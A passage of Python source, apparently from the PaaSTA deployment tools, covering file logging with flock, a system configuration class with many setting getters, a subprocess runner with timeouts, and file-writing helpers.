# https://github.com/python/typeshed/issues/1548
return flock(fd)
else:
return _empty_context()
def format_path(
self, service: str, component: str, level: str, cluster: str, instance: str
) -> str:
return self.path_format.format(
service=service,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_message(self, path: str, message: str) -> None:
# We use io.FileIO here because it guarantees that write() is implemented with a single write syscall,
# and on Linux, writes to O_APPEND files with a single write syscall are atomic.
#
# https://docs.python.org/2/library/io.html#io.FileIO
# http://article.gmane.org/gmane.linux.kernel/43445
try:
with io.FileIO(path, mode=self.mode, closefd=True) as f:
with self.maybe_flock(f):
f.write(message.encode("UTF-8"))
except IOError as e:
print(
"Could not log to {}: {}: {} -- would have logged: {}".format(
path, type(e).__name__, str(e), message
),
file=sys.stderr,
)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(service, component, level, cluster, instance)
to_write = "{}{}".format(
format_log_line(level, cluster, service, instance, component, line),
self.line_delimiter,
)
self._log_message(path, to_write)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(AUDIT_LOG_STREAM, "", "", cluster, instance)
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
to_write = f"{formatted_line}{self.line_delimiter}"
self._log_message(path, to_write)
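# Illustrative log_writer configuration selecting this driver (hypothetical
# path_format; the placeholders are filled in by format_path above):
#
#     {
#         "log_writer": {
#             "driver": "file",
#             "options": {
#                 "path_format": "/var/log/paasta/{service}/{component}.log",
#                 "flock": true
#             }
#         }
#     }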
@contextlib.contextmanager
def flock(fd: _AnyIO) -> Iterator[None]:
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX)
yield
finally:
fcntl.flock(fd.fileno(), fcntl.LOCK_UN)
@contextlib.contextmanager
def timed_flock(fd: _AnyIO, seconds: int = 1) -> Iterator[None]:
""" Attempt to grab an exclusive flock with a timeout. Uses Timeout, so will
raise a TimeoutError if `seconds` elapses before the flock can be obtained
"""
# We don't want to wrap the user code in the timeout, just the flock grab
flock_context = flock(fd)
with Timeout(seconds=seconds):
flock_context.__enter__()
try:
yield
finally:
flock_context.__exit__(*sys.exc_info())
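# Illustrative usage (hypothetical lock file): only the flock acquisition is bounded
# by the timeout, not the body of the `with` block.
#
#     with open("/tmp/example.lock", "a+") as f:
#         with timed_flock(f, seconds=5):
#             ...  # exclusive access; TimeoutError if the lock isn't acquired in 5s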
def _timeout(process: Popen) -> None:
"""Helper function for _run. It terminates the process.
Doesn't raise OSError if we try to terminate a non-existing
process, as there can be a very small window between poll() and kill()
"""
if process.poll() is None:
try:
# sending SIGKILL to the process
process.kill()
except OSError as e:
# No such process error
# The process could have been terminated meanwhile
if e.errno != errno.ESRCH:
raise
class PaastaNotConfiguredError(Exception):
pass
class NoConfigurationForServiceError(Exception):
pass
def get_readable_files_in_glob(glob: str, path: str) -> List[str]:
"""
Returns a sorted list of readable files matching the given glob, found by recursively searching the given path
"""
globbed_files = []
for root, dirs, files in os.walk(path):
for f in files:
fn = os.path.join(root, f)
if os.path.isfile(fn) and os.access(fn, os.R_OK) and fnmatch(fn, glob):
globbed_files.append(fn)
return sorted(globbed_files)
class ClusterAutoscalingResource(TypedDict):
type: str
id: str
region: str
pool: str
min_capacity: int
max_capacity: int
IdToClusterAutoscalingResourcesDict = Dict[str, ClusterAutoscalingResource]
class ResourcePoolSettings(TypedDict):
target_utilization: float
drain_timeout: int
PoolToResourcePoolSettingsDict = Dict[str, ResourcePoolSettings]
class MarathonConfigDict(TypedDict, total=False):
user: str
password: str
url: List[str]
class LocalRunConfig(TypedDict, total=False):
default_cluster: str
class RemoteRunConfig(TypedDict, total=False):
default_role: str
class SparkRunConfig(TypedDict, total=False):
default_cluster: str
default_pool: str
class PaastaNativeConfig(TypedDict, total=False):
principal: str
secret: str
ExpectedSlaveAttributes = List[Dict[str, Any]]
class KubeKindDict(TypedDict, total=False):
singular: str
plural: str
class KubeCustomResourceDict(TypedDict, total=False):
version: str
file_prefix: str
kube_kind: KubeKindDict
group: str
class KubeStateMetricsCollectorConfigDict(TypedDict, total=False):
unaggregated_metrics: List[str]
summed_metric_to_group_keys: Dict[str, List[str]]
label_metric_to_label_key: Dict[str, List[str]]
label_renames: Dict[str, str]
class SystemPaastaConfigDict(TypedDict, total=False):
api_endpoints: Dict[str, str]
api_profiling_config: Dict
auth_certificate_ttl: str
auto_config_instance_types_enabled: Dict[str, bool]
auto_hostname_unique_size: int
boost_regions: List[str]
cluster_autoscaler_max_decrease: float
cluster_autoscaler_max_increase: float
cluster_autoscaling_draining_enabled: bool
cluster_autoscaling_resources: IdToClusterAutoscalingResourcesDict
cluster_boost_enabled: bool
cluster_fqdn_format: str
clusters: Sequence[str]
cluster: str
dashboard_links: Dict[str, Dict[str, str]]
default_push_groups: List
default_should_run_uwsgi_exporter_sidecar: bool
deploy_blacklist: UnsafeDeployBlacklist
deployd_big_bounce_deadline: float
deployd_log_level: str
deployd_maintenance_polling_frequency: int
deployd_max_service_instance_failures: int
deployd_metrics_provider: str
deployd_number_workers: int
deployd_startup_bounce_deadline: float
deployd_startup_oracle_enabled: bool
deployd_use_zk_queue: bool
deployd_worker_failure_backoff_factor: int
deploy_whitelist: UnsafeDeployWhitelist
disabled_watchers: List
dockercfg_location: str
docker_registry: str
enable_client_cert_auth: bool
enable_nerve_readiness_check: bool
enable_envoy_readiness_check: bool
enforce_disk_quota: bool
envoy_admin_domain_name: str
envoy_admin_endpoint_format: str
envoy_nerve_readiness_check_script: List[str]
envoy_readiness_check_script: List[str]
expected_slave_attributes: ExpectedSlaveAttributes
filter_bogus_mesos_cputime_enabled: bool
fsm_template: str
git_config: Dict
hacheck_sidecar_image_url: str
hacheck_sidecar_volumes: List[DockerVolume]
kubernetes_add_registration_labels: bool
kubernetes_custom_resources: List[KubeCustomResourceDict]
kubernetes_use_hacheck_sidecar: bool
enable_custom_cassandra_status_writer: bool
ldap_host: str
ldap_reader_password: str
ldap_reader_username: str
ldap_search_base: str
ldap_search_ou: str
local_run_config: LocalRunConfig
log_reader: LogReaderConfig
log_writer: LogWriterConfig
maintenance_resource_reservation_enabled: bool
marathon_servers: List[MarathonConfigDict]
mark_for_deployment_max_polling_threads: int
mark_for_deployment_default_polling_interval: float
mark_for_deployment_default_diagnosis_interval: float
mark_for_deployment_default_default_time_before_first_diagnosis: float
mark_for_deployment_should_ping_for_unhealthy_pods: bool
mesos_config: Dict
metrics_provider: str
monitoring_config: Dict
nerve_readiness_check_script: List[str]
paasta_native: PaastaNativeConfig
paasta_status_version: str
pdb_max_unavailable: Union[str, int]
pki_backend: str
pod_defaults: Dict[str, Any]
previous_marathon_servers: List[MarathonConfigDict]
register_k8s_pods: bool
register_marathon_services: bool
register_native_services: bool
remote_run_config: RemoteRunConfig
resource_pool_settings: PoolToResourcePoolSettingsDict
secret_provider: str
security_check_command: str
sensu_host: str
sensu_port: int
service_discovery_providers: Dict[str, Any]
slack: Dict[str, str]
spark_run_config: SparkRunConfig
supported_storage_classes: Sequence[str]
synapse_haproxy_url_format: str
synapse_host: str
synapse_port: int
taskproc: Dict
tron: Dict
uwsgi_exporter_sidecar_image_url: str
vault_cluster_map: Dict
vault_environment: str
volumes: List[DockerVolume]
zookeeper: str
tron_use_k8s: bool
skip_cpu_override_validation: List[str]
def load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Reads Paasta configs in specified directory in lexicographical order and deep merges
the dictionaries (last file wins).
"""
if not os.path.isdir(path):
raise PaastaNotConfiguredError(
"Could not find system paasta configuration directory: %s" % path
)
if not os.access(path, os.R_OK):
raise PaastaNotConfiguredError(
"Could not read from system paasta configuration directory: %s" % path
)
try:
file_stats = frozenset(
{
(fn, os.stat(fn))
for fn in get_readable_files_in_glob(glob="*.json", path=path)
}
)
return parse_system_paasta_config(file_stats, path)
except IOError as e:
raise PaastaNotConfiguredError(
f"Could not load system paasta config file {e.filename}: {e.strerror}"
)
def optionally_load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Tries to load the system paasta config, but will return an empty configuration if not available,
without raising.
"""
try:
return load_system_paasta_config(path=path)
except PaastaNotConfiguredError:
return SystemPaastaConfig({}, "")
@lru_cache()
def parse_system_paasta_config(
file_stats: FrozenSet[Tuple[str, os.stat_result]], path: str
) -> "SystemPaastaConfig":
"""Pass in a dictionary of filename -> os.stat_result, and this returns the merged parsed configs"""
config: SystemPaastaConfigDict = {}
for filename, _ in file_stats:
with open(filename) as f:
config = deep_merge_dictionaries(
json.load(f), config, allow_duplicate_keys=False
)
return SystemPaastaConfig(config, path)
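# Note on caching (follows from the code above): parse_system_paasta_config is
# lru_cache'd on the frozenset of (filename, os.stat_result) pairs, so repeated calls
# to load_system_paasta_config re-parse the JSON files only when a file's stat result
# (mtime, size, inode, ...) changes.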
class SystemPaastaConfig:
def __init__(self, config: SystemPaastaConfigDict, directory: str) -> None:
self.directory = directory
self.config_dict = config
def __eq__(self, other: Any) -> bool:
if isinstance(other, SystemPaastaConfig):
return (
self.directory == other.directory
and self.config_dict == other.config_dict
)
return False
def __repr__(self) -> str:
return f"SystemPaastaConfig({self.config_dict!r}, {self.directory!r})"
def get_zk_hosts(self) -> str:
"""Get the zk_hosts defined in this hosts's cluster config file.
Strips off the zk:// prefix, if it exists, for use with Kazoo.
:returns: The zk_hosts specified in the paasta configuration
"""
try:
hosts = self.config_dict["zookeeper"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find zookeeper connection string in configuration directory: %s"
% self.directory
)
# how do python strings not have a method for doing this
if hosts.startswith("zk://"):
return hosts[len("zk://") :]
return hosts
def get_system_docker_registry(self) -> str:
"""Get the docker_registry defined in this host's cluster config file.
:returns: The docker_registry specified in the paasta configuration
"""
try:
return self.config_dict["docker_registry"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find docker registry in configuration directory: %s"
% self.directory
)
def get_hacheck_sidecar_volumes(self) -> List[DockerVolume]:
"""Get the hacheck sidecar volumes defined in this host's hacheck_sidecar_volumes config file.
:returns: The list of volumes specified in the paasta configuration
"""
try:
volumes = self.config_dict["hacheck_sidecar_volumes"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find hacheck_sidecar_volumes in configuration directory: %s"
% self.directory
)
return _reorder_docker_volumes(list(volumes))
def get_volumes(self) -> Sequence[DockerVolume]:
"""Get the volumes defined in this host's volumes config file.
:returns: The list of volumes specified in the paasta configuration
"""
try:
return self.config_dict["volumes"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find volumes in configuration directory: %s" % self.directory
)
def get_cluster(self) -> str:
"""Get the cluster defined in this host's cluster config file.
:returns: The name of the cluster defined in the paasta configuration
"""
try:
return self.config_dict["cluster"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find cluster in configuration directory: %s" % self.directory
)
def get_dashboard_links(self) -> Mapping[str, Mapping[str, str]]:
return self.config_dict["dashboard_links"]
def get_auto_hostname_unique_size(self) -> int:
"""
We automatically add a ["hostname", "UNIQUE"] constraint to "small" services running in production clusters.
If there are less than or equal to this number of instances, we consider it small.
We fail safe and return -1 to avoid adding the ['hostname', 'UNIQUE'] constraint if this value is not defined
:returns: The integer size of a small service
"""
return self.config_dict.get("auto_hostname_unique_size", -1)
def get_auto_config_instance_types_enabled(self) -> Dict[str, bool]:
return self.config_dict.get("auto_config_instance_types_enabled", {})
def get_api_endpoints(self) -> Mapping[str, str]:
return self.config_dict["api_endpoints"]
def get_enable_client_cert_auth(self) -> bool:
"""
If enabled present a client certificate from ~/.paasta/pki/<cluster>.crt and ~/.paasta/pki/<cluster>.key
"""
return self.config_dict.get("enable_client_cert_auth", True)
def get_enable_nerve_readiness_check(self) -> bool:
"""
If enabled perform readiness checks on nerve
"""
return self.config_dict.get("enable_nerve_readiness_check", True)
def get_enable_envoy_readiness_check(self) -> bool:
"""
If enabled perform readiness checks on envoy
"""
return self.config_dict.get("enable_envoy_readiness_check", False)
def get_nerve_readiness_check_script(self) -> List[str]:
return self.config_dict.get(
"nerve_readiness_check_script", ["/check_smartstack_up.sh"]
)
def get_envoy_readiness_check_script(self) -> List[str]:
return self.config_dict.get(
"envoy_readiness_check_script",
["/check_proxy_up.sh", "--enable-envoy", "--envoy-check-mode", "eds-dir"],
)
def get_envoy_nerve_readiness_check_script(self) -> List[str]:
return self.config_dict.get(
"envoy_nerve_readiness_check_script",
["/check_proxy_up.sh", "--enable-smartstack", "--enable-envoy"],
)
def get_enforce_disk_quota(self) -> bool:
"""
If enabled, add `--storage-opt size=SIZE` arg to `docker run` calls,
enforcing the disk quota as a result.
Please note that this should be enabled only for a supported environment
(which at the moment is only `overlay2` driver backed by `XFS`
filesystem mounted with `prjquota` option) otherwise Docker will fail
to start.
"""
return self.config_dict.get("enforce_disk_quota", False)
def get_auth_certificate_ttl(self) -> str:
"""
How long a TTL to request on auth certificates. Note that this may be limited
by policy in Vault
"""
return self.config_dict.get("auth_certificate_ttl", "11h")
def get_pki_backend(self) -> str:
"""
The Vault pki backend to use for issuing certificates
"""
return self.config_dict.get("pki_backend", "paastaca")
def get_fsm_template(self) -> str:
fsm_path = os.path.dirname(paasta_tools.cli.fsm.__file__)
template_path = os.path.join(fsm_path, "template")
return self.config_dict.get("fsm_template", template_path)
def get_log_writer(self) -> LogWriterConfig:
"""Get the log_writer configuration out of global paasta config
:returns: The log_writer dictionary.
"""
try:
return self.config_dict["log_writer"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_writer in configuration directory: %s"
% self.directory
)
def get_log_reader(self) -> LogReaderConfig:
"""Get the log_reader configuration out of global paasta config
:returns: the log_reader dictionary.
"""
try:
return self.config_dict["log_reader"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_reader in configuration directory: %s"
% self.directory
)
def get_metrics_provider(self) -> Optional[str]:
"""Get the metrics_provider configuration out of global paasta config
:returns: A string identifying the metrics_provider
"""
deployd_metrics_provider = self.config_dict.get("deployd_metrics_provider")
if deployd_metrics_provider is not None:
return deployd_metrics_provider
return self.config_dict.get("metrics_provider")
def get_deployd_worker_failure_backoff_factor(self) -> int:
"""Get the factor for calculating exponential backoff when a deployd worker
fails to bounce a service
:returns: An integer
"""
return self.config_dict.get("deployd_worker_failure_backoff_factor", 30)
def get_deployd_maintenance_polling_frequency(self) -> int:
"""Get the frequency in seconds that the deployd maintenance watcher should
poll mesos's api for new draining hosts
:returns: An integer
"""
return self.config_dict.get("deployd_maintenance_polling_frequency", 30)
def get_deployd_startup_oracle_enabled(self) -> bool:
"""This controls whether deployd will add all services that need a bounce on
startup. Generally this is desirable behavior. If you are performing a bounce
of *all* services you will want to disable this.
:returns: A boolean
"""
return self.config_dict.get("deployd_startup_oracle_enabled", True)
def get_deployd_max_service_instance_failures(self) -> int:
"""Determines how many times a service instance entry in deployd's queue
can fail before it will be removed from the queue.
:returns: An integer
"""
return self.config_dict.get("deployd_max_service_instance_failures", 20)
def get_sensu_host(self) -> str:
"""Get the host that we should send sensu events to.
:returns: the sensu_host string, or localhost if not specified.
"""
return self.config_dict.get("sensu_host", "localhost")
def get_sensu_port(self) -> int:
"""Get the port that we should send sensu events to.
:returns: the sensu_port value as an integer, or 3030 if not specified.
"""
return int(self.config_dict.get("sensu_port", 3030))
def get_dockercfg_location(self) -> str:
"""Get the location of the dockerfile, as a URI.
:returns: the URI specified, or file:///root/.dockercfg if not specified.
"""
return self.config_dict.get("dockercfg_location", DEFAULT_DOCKERCFG_LOCATION)
def get_synapse_port(self) -> int:
"""Get the port that haproxy-synapse exposes its status on. Defaults to 3212.
:returns: the haproxy-synapse status port."""
return int(self.config_dict.get("synapse_port", 3212))
def get_default_synapse_host(self) -> str:
"""Get the default host we should interrogate for haproxy-synapse state.
:returns: A hostname that is running haproxy-synapse."""
return self.config_dict.get("synapse_host", "localhost")
def get_synapse_haproxy_url_format(self) -> str:
"""Get a format string for the URL to query for haproxy-synapse state. This format string gets two keyword
arguments, host and port. Defaults to "http://{host:s}:{port:d}/;csv;norefresh".
:returns: A format string for constructing the URL of haproxy-synapse's status page."""
return self.config_dict.get(
"synapse_haproxy_url_format", DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT
)
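# Worked example (hypothetical values): with the default template,
#
#     DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT.format(
#         host="10.0.0.1", port=3212, scope="example_service.main"
#     )
#     # -> "http://10.0.0.1:3212/;csv;norefresh;scope=example_service.main"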
def get_service_discovery_providers(self) -> Dict[str, Any]:
return self.config_dict.get("service_discovery_providers", {})
def get_cluster_autoscaling_resources(self) -> IdToClusterAutoscalingResourcesDict:
return self.config_dict.get("cluster_autoscaling_resources", {})
def get_cluster_autoscaling_draining_enabled(self) -> bool:
""" Enable mesos maintenance mode and trigger draining of instances before the
autoscaler terminates the instance.
:returns: A bool"""
return self.config_dict.get("cluster_autoscaling_draining_enabled", True)
def get_cluster_autoscaler_max_increase(self) -> float:
""" Set the maximum increase that the cluster autoscaler can make in each run
:returns: A float"""
return self.config_dict.get("cluster_autoscaler_max_increase", 0.2)
def get_cluster_autoscaler_max_decrease(self) -> float:
""" Set the maximum decrease that the cluster autoscaler can make in each run
:returns: A float"""
return self.config_dict.get("cluster_autoscaler_max_decrease", 0.1)
def get_maintenance_resource_reservation_enabled(self) -> bool:
""" Enable un/reserving of resources when we un/drain a host in mesos maintenance
*and* after tasks are killed in setup_marathon_job etc.
:returns: A bool"""
return self.config_dict.get("maintenance_resource_reservation_enabled", True)
def get_cluster_boost_enabled(self) -> bool:
""" Enable the cluster boost. Note that the boost only applies to the CPUs.
If the boost is toggled on here but not configured, it will be transparent.
        :returns: A bool: True means cluster boost is enabled."""
return self.config_dict.get("cluster_boost_enabled", False)
def get_resource_pool_settings(self) -> PoolToResourcePoolSettingsDict:
return self.config_dict.get("resource_pool_settings", {})
def get_cluster_fqdn_format(self) -> str:
"""Get a format string that constructs a DNS name pointing at the paasta masters in a cluster. This format
string gets one parameter: cluster. Defaults to 'paasta-{cluster:s}.yelp'.
:returns: A format string for constructing the FQDN of the masters in a given cluster."""
return self.config_dict.get("cluster_fqdn_format", "paasta-{cluster:s}.yelp")
def get_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("marathon_servers", [])
def get_previous_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("previous_marathon_servers", [])
def get_paasta_status_version(self) -> str:
"""Get paasta status version string (new | old). Defaults to 'old'.
        :returns: A string with the desired version of paasta status."""
return self.config_dict.get("paasta_status_version", "old")
def get_local_run_config(self) -> LocalRunConfig:
"""Get the local-run config
:returns: The local-run job config dictionary"""
return self.config_dict.get("local_run_config", {})
def get_remote_run_config(self) -> RemoteRunConfig:
"""Get the remote-run config
:returns: The remote-run system_paasta_config dictionary"""
return self.config_dict.get("remote_run_config", {})
def get_spark_run_config(self) -> SparkRunConfig:
"""Get the spark-run config
:returns: The spark-run system_paasta_config dictionary"""
return self.config_dict.get("spark_run_config", {})
def get_paasta_native_config(self) -> PaastaNativeConfig:
return self.config_dict.get("paasta_native", {})
def get_mesos_cli_config(self) -> Dict:
"""Get the config for mesos-cli
:returns: The mesos cli config
"""
return self.config_dict.get("mesos_config", {})
def get_monitoring_config(self) -> Dict:
"""Get the monitoring config
:returns: the monitoring config dictionary"""
return self.config_dict.get("monitoring_config", {})
def get_deploy_blacklist(self) -> DeployBlacklist:
"""Get global blacklist. This applies to all services
in the cluster
:returns: The blacklist
"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""Get global whitelist. This applies to all services
in the cluster
:returns: The whitelist
"""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_expected_slave_attributes(self) -> ExpectedSlaveAttributes:
"""Return a list of dictionaries, representing the expected combinations of attributes in this cluster. Used for
calculating the default routing constraints."""
return self.config_dict.get("expected_slave_attributes")
def get_security_check_command(self) -> Optional[str]:
"""Get the script to be executed during the security-check build step
:return: The name of the file
"""
return self.config_dict.get("security_check_command", None)
def get_deployd_number_workers(self) -> int:
"""Get the number of workers to consume deployment q
:return: integer
"""
return self.config_dict.get("deployd_number_workers", 4)
def get_deployd_big_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances for SystemPaastaConfig
changes.
:return: float
"""
return float(
self.config_dict.get("deployd_big_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_startup_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances on deployd startup.
:return: float
"""
return float(
self.config_dict.get("deployd_startup_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_log_level(self) -> str:
"""Get the log level for paasta-deployd
:return: string name of python logging level, e.g. INFO, DEBUG etc.
"""
return self.config_dict.get("deployd_log_level", "INFO")
def get_deployd_use_zk_queue(self) -> bool:
return self.config_dict.get("deployd_use_zk_queue", True)
def get_hacheck_sidecar_image_url(self) -> str:
"""Get the docker image URL for the hacheck sidecar container"""
return self.config_dict.get("hacheck_sidecar_image_url")
def get_register_k8s_pods(self) -> bool:
"""Enable registration of k8s services in nerve"""
return self.config_dict.get("register_k8s_pods", False)
def get_kubernetes_add_registration_labels(self) -> bool:
return self.config_dict.get("kubernetes_add_registration_labels", False)
def get_kubernetes_custom_resources(self) -> Sequence[KubeCustomResourceDict]:
"""List of custom resources that should be synced by setup_kubernetes_cr """
return self.config_dict.get("kubernetes_custom_resources", [])
def get_kubernetes_use_hacheck_sidecar(self) -> bool:
return self.config_dict.get("kubernetes_use_hacheck_sidecar", True)
def get_enable_custom_cassandra_status_writer(self) -> bool:
return self.config_dict.get("enable_custom_cassandra_status_writer", False)
def get_register_marathon_services(self) -> bool:
"""Enable registration of marathon services in nerve"""
return self.config_dict.get("register_marathon_services", True)
def get_register_native_services(self) -> bool:
"""Enable registration of native paasta services in nerve"""
return self.config_dict.get("register_native_services", False)
def get_taskproc(self) -> Dict:
return self.config_dict.get("taskproc", {})
def get_disabled_watchers(self) -> List:
return self.config_dict.get("disabled_watchers", [])
def get_vault_environment(self) -> Optional[str]:
""" Get the environment name for the vault cluster
This must match the environment keys in the secret json files
used by all services in this cluster"""
return self.config_dict.get("vault_environment")
def get_vault_cluster_config(self) -> dict:
""" Get a map from paasta_cluster to vault ecosystem. We need
this because not every ecosystem will have its own vault cluster"""
return self.config_dict.get("vault_cluster_map", {})
def get_secret_provider_name(self) -> str:
""" Get the name for the configured secret_provider, used to
decrypt secrets"""
return self.config_dict.get("secret_provider", "paasta_tools.secret_providers")
def get_slack_token(self) -> str:
""" Get a slack token for slack notifications. Returns None if there is
none available """
return self.config_dict.get("slack", {}).get("token", None)
def get_tron_config(self) -> dict:
return self.config_dict.get("tron", {})
def get_clusters(self) -> Sequence[str]:
return self.config_dict.get("clusters", [])
def get_supported_storage_classes(self) -> Sequence[str]:
return self.config_dict.get("supported_storage_classes", [])
def get_envoy_admin_endpoint_format(self) -> str:
""" Get the format string for Envoy's admin interface. """
return self.config_dict.get(
"envoy_admin_endpoint_format", "http://{host:s}:{port:d}/{endpoint:s}"
)
def get_envoy_admin_port(self) -> int:
""" Get the port that Envoy's admin interface is listening on
from /etc/services. """
return socket.getservbyname(
self.config_dict.get("envoy_admin_domain_name", "envoy-admin")
)
def get_pdb_max_unavailable(self) -> Union[str, int]:
return self.config_dict.get("pdb_max_unavailable", 0)
def get_boost_regions(self) -> List[str]:
return self.config_dict.get("boost_regions", [])
def get_pod_defaults(self) -> Dict[str, Any]:
return self.config_dict.get("pod_defaults", {})
def get_ldap_search_base(self) -> str:
return self.config_dict.get("ldap_search_base", None)
def get_ldap_search_ou(self) -> str:
return self.config_dict.get("ldap_search_ou", None)
def get_ldap_host(self) -> str:
return self.config_dict.get("ldap_host", None)
def get_ldap_reader_username(self) -> str:
return self.config_dict.get("ldap_reader_username", None)
def get_ldap_reader_password(self) -> str:
return self.config_dict.get("ldap_reader_password", None)
def get_default_push_groups(self) -> List:
return self.config_dict.get("default_push_groups", None)
def get_git_config(self) -> Dict:
"""Gets git configuration. Includes repo names and their git servers.
:returns: the git config dict
"""
return self.config_dict.get(
"git_config",
{
"git_user": "git",
"repos": {
"yelpsoa-configs": {
"repo_name": "yelpsoa-configs",
"git_server": DEFAULT_SOA_CONFIGS_GIT_URL,
"deploy_server": DEFAULT_SOA_CONFIGS_GIT_URL,
},
},
},
)
def get_git_repo_config(self, repo_name: str) -> Dict:
"""Gets the git configuration for a specific repo.
:returns: the git config dict for a specific repo.
"""
return self.get_git_config().get("repos", {}).get(repo_name, {})
def get_uwsgi_exporter_sidecar_image_url(self) -> str:
"""Get the docker image URL for the uwsgi_exporter sidecar container"""
return self.config_dict.get(
"uwsgi_exporter_sidecar_image_url",
"docker-paasta.yelpcorp.com:443/uwsgi_exporter-k8s-sidecar:v1.0.0-yelp2",
)
def default_should_run_uwsgi_exporter_sidecar(self) -> bool:
return self.config_dict.get("default_should_run_uwsgi_exporter_sidecar", False)
def get_mark_for_deployment_max_polling_threads(self) -> int:
return self.config_dict.get("mark_for_deployment_max_polling_threads", 4)
def get_mark_for_deployment_default_polling_interval(self) -> float:
return self.config_dict.get("mark_for_deployment_default_polling_interval", 60)
def get_mark_for_deployment_default_diagnosis_interval(self) -> float:
return self.config_dict.get(
"mark_for_deployment_default_diagnosis_interval", 60
)
def get_mark_for_deployment_default_time_before_first_diagnosis(self) -> float:
return self.config_dict.get(
"mark_for_deployment_default_default_time_before_first_diagnosis", 300
)
def get_mark_for_deployment_should_ping_for_unhealthy_pods(self) -> bool:
return self.config_dict.get(
"mark_for_deployment_should_ping_for_unhealthy_pods", True
)
def get_tron_use_k8s_default(self) -> bool:
return self.config_dict.get("tron_use_k8s", False)
def get_api_profiling_config(self) -> Dict:
return self.config_dict.get(
"api_profiling_config", {"cprofile_sampling_enabled": False},
)
def get_skip_cpu_override_validation_services(self) -> List[str]:
return self.config_dict.get("skip_cpu_override_validation", [])
def _run(
command: Union[str, List[str]],
env: Mapping[str, str] = os.environ,
timeout: float = None,
log: bool = False,
stream: bool = False,
stdin: Any = None,
stdin_interrupt: bool = False,
popen_kwargs: Dict = {},
**kwargs: Any,
) -> Tuple[int, str]:
"""Given a command, run it. Return a tuple of the return code and any
output.
:param timeout: If specified, the command will be terminated after timeout
seconds.
    :param log: If True, output will be logged by _run via _log. If set, it is mandatory
to pass at least a :service: and a :component: parameter. Optionally you
can pass :cluster:, :instance: and :loglevel: parameters for logging.
We wanted to use plumbum instead of rolling our own thing with
subprocess.Popen but were blocked by
https://github.com/tomerfiliba/plumbum/issues/162 and our local BASH_FUNC
magic.
"""
output: List[str] = []
if log:
service = kwargs["service"]
component = kwargs["component"]
cluster = kwargs.get("cluster", ANY_CLUSTER)
instance = kwargs.get("instance", ANY_INSTANCE)
loglevel = kwargs.get("loglevel", DEFAULT_LOGLEVEL)
try:
if not isinstance(command, list):
command = shlex.split(command)
popen_kwargs["stdout"] = PIPE
popen_kwargs["stderr"] = STDOUT
popen_kwargs["stdin"] = stdin
popen_kwargs["env"] = env
process = Popen(command, **popen_kwargs)
if stdin_interrupt:
def signal_handler(signum: int, frame: FrameType) -> None:
process.stdin.write("\n".encode("utf-8"))
process.stdin.flush()
process.wait()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# start the timer if we specified a timeout
if timeout:
proctimer = threading.Timer(timeout, _timeout, [process])
proctimer.start()
outfn: Any = print if stream else output.append
for linebytes in iter(process.stdout.readline, b""):
line = linebytes.decode("utf-8", errors="replace").rstrip("\n")
outfn(line)
if log:
_log(
service=service,
line=line,
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
# when finished, get the exit code
process.wait()
returncode = process.returncode
except OSError as e:
if log:
_log(
service=service,
line=e.strerror.rstrip("\n"),
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
output.append(e.strerror.rstrip("\n"))
returncode = e.errno
except (KeyboardInterrupt, SystemExit):
# need to clean up the timing thread here
if timeout:
proctimer.cancel()
raise
else:
# Stop the timer
if timeout:
proctimer.cancel()
if returncode == -9:
output.append(f"Command '{command}' timed out (longer than {timeout}s)")
return returncode, "\n".join(output)
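# Illustrative usage sketch (the command is made up): run a command and collect
# its combined stdout/stderr. If `timeout` is given, the process is killed by
# the module's _timeout helper once the deadline passes and a "timed out"
# message is appended to the output.
#
#     returncode, output = _run(["/bin/echo", "hello"], timeout=10)
#     # -> (0, "hello")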
def get_umask() -> int:
"""Get the current umask for this process. NOT THREAD SAFE."""
old_umask = os.umask(0o0022)
os.umask(old_umask)
return old_umask
def get_user_agent() -> str:
base_name = os.path.basename(sys.argv[0])
if base_name == "gunicorn":
return f"{sys.argv[-1]} {paasta_tools.__version__}"
elif len(sys.argv) >= 1:
return f"{base_name} {paasta_tools.__version__}"
else:
return f"PaaSTA Tools {paasta_tools.__version__}"
@contextlib.contextmanager
def atomic_file_write(target_path: str) -> Iterator[IO]:
dirname = os.path.dirname(target_path)
basename = os.path.basename(target_path)
if target_path == "-":
yield sys.stdout
else:
with tempfile.NamedTemporaryFile(
dir=dirname, prefix=(".%s-" % basename), delete=False, mode="w"
) as f:
temp_target_path = f.name
yield f
mode = 0o0666 & (~get_umask())
os.chmod(temp_target_path, mode)
os.rename(temp_target_path, target_path)
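# Illustrative usage (the path is a placeholder): content is written to a
# temporary file in the same directory and atomically renamed into place when
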